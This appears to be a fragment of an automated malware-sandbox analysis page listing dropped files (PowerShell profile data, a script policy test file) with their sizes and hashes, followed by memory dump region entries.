83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
235a8eb126d835efb2e253459ab8b089

SHA1
293fbf68e6726a5a230c3a42624c01899e35a89f

SHA256
5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

SHA512
a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v2ldw154.qty.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/980-48-0x000001AE6E0B0000-0x000001AE6E0B1000-memory.dmp

Filesize
4KB

Download
memory/4220-10-0x00007FFE07290000-0x00007FFE07D52000-memory.dmp

Filesize
10.8MB

Download
memory/4220-30-0x00007FFE07290000-0x00007FFE07D52000-memory.dmp

Filesize
10.8MB

Download
memory/4220-47-0x00007FFE07290000-0x00007FFE07D52000-memory.dmp

Filesize
10.8MB

Download
memory/4220-19-0x00007FFE07290000-0x00007FFE07D52000-memory.dmp

Filesize
10.8MB

Download
memory/4220-0-0x00007FFE07293000-0x00007FFE07295000-memory.dmp

Filesize
8KB

Download
memory/4220-6-0x000001EA758D0000-0x000001EA758F2000-memory.dmp

Filesize
136KB

Download
memory/4912-21-0x00007FFE07290000-0x00007FFE07D52000-memory.dmp

Filesize
10.8MB

Download
memory/4912-20-0x00007FFE07290000-0x00007FFE07D52000-memory.dmp

Filesize
10.8MB

Download
memory/4912-36-0x00007FFE07290000-0x00007FFE07D52000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing